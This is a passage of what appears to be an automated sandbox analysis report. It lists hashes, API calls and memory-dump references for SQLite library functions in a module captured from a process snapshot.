                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID: la
                                              • API String ID: 1477753154-1065728030
                                              • Opcode ID: 040953b9ae32d4364d2e616fa33ded3a165805e5c3fbf4f526c6615aa242226b
                                              • Instruction ID: ad1256901f14d57907608e158496be7411bbd406befdef08a9525b0e7e76474d
                                              • Opcode Fuzzy Hash: 040953b9ae32d4364d2e616fa33ded3a165805e5c3fbf4f526c6615aa242226b
                                              • Instruction Fuzzy Hash: 9111ADB1A117069BDB00CF69E99065EBBB1FF9B355F14802AD8049B300C332E891CBD1
                                              Function 61E2DA0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E2DA26
                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E2DA32
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                              • String ID:
                                              • API String ID: 3265351223-3916222277
                                              • Opcode ID: 29088a66ef9cead2b435dad6301b28640f5a0e0faf32ff4d7cbac7b703c10f1f
                                              • Instruction ID: 337ca004d7ee2152a5b1af5b8dc58ac4879e59c90e9d277551212eef3c968ebd
                                              • Opcode Fuzzy Hash: 29088a66ef9cead2b435dad6301b28640f5a0e0faf32ff4d7cbac7b703c10f1f
                                              • Instruction Fuzzy Hash: 60019EB49083059BEF049FB9C4C466ABBF4FF45364F24C69DD9A48B289D730C9508B82
                                              Function 61E03BB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_stricmp
                                              • String ID: main
                                              • API String ID: 912767213-3207122276
                                              • Opcode ID: 5b1f8c738bd9eeddda8afe8dc69cd6b414263c7b2507367e53825b45731012cf
                                              • Instruction ID: c1af66f144f3333b2d36df8c75fe005e63d16ba28a4ecceeeb25e7f0e4fd55cc
                                              • Opcode Fuzzy Hash: 5b1f8c738bd9eeddda8afe8dc69cd6b414263c7b2507367e53825b45731012cf
                                              • Instruction Fuzzy Hash: 17F0C2726083415FB3049EEE95C4916BFE8AE9222EF22C63ED95597380DA31D814CA61
                                              Function 61E3988E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_initialize.SQLITE3 ref: 61E39895
                                              • sqlite3_str_vappendf.SQLITE3 ref: 61E398E0
                                                • Part of subcall function 61E1D057: sqlite3_str_append.SQLITE3 ref: 61E1D0D3
                                                • Part of subcall function 61E1D057: sqlite3_str_append.SQLITE3 ref: 61E1D107
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_str_append$sqlite3_initializesqlite3_str_vappendf
                                              • String ID: F
                                              • API String ID: 907554859-1304234792
                                              • Opcode ID: f257830476a5f53bf7a94a5a7eb34a41f9c4f5b814e0ea2d987e238665e6f879
                                              • Instruction ID: e037d5918e26215f5f414e5fcdf2bc10094a9e1f2f884176f4c188b060f94545
                                              • Opcode Fuzzy Hash: f257830476a5f53bf7a94a5a7eb34a41f9c4f5b814e0ea2d987e238665e6f879
                                              • Instruction Fuzzy Hash: 3DF0F9B0D0438A8BDB00DFA8C59478EBFF4AB81348F20C529D8489F304E775D544CB41
                                              Function 61E100B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteCriticalSection.KERNEL32 ref: 61E100CA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: CriticalDeleteSection
                                              • String ID: 0a$a
                                              • API String ID: 166494926-871096936
                                              • Opcode ID: df4e6e61ab03b707d50a0083a6b5c3e93adc3326cbadf535120b2040a216b1ac
                                              • Instruction ID: 71c2761e19e17bff6cffe3ff051af5facf099a529fcc220601890305df531003
                                              • Opcode Fuzzy Hash: df4e6e61ab03b707d50a0083a6b5c3e93adc3326cbadf535120b2040a216b1ac
                                              • Instruction Fuzzy Hash: 74D02BB1416615D7DF00AF959D8268AFBACFB08264F904C69DF048B300D131E05087F1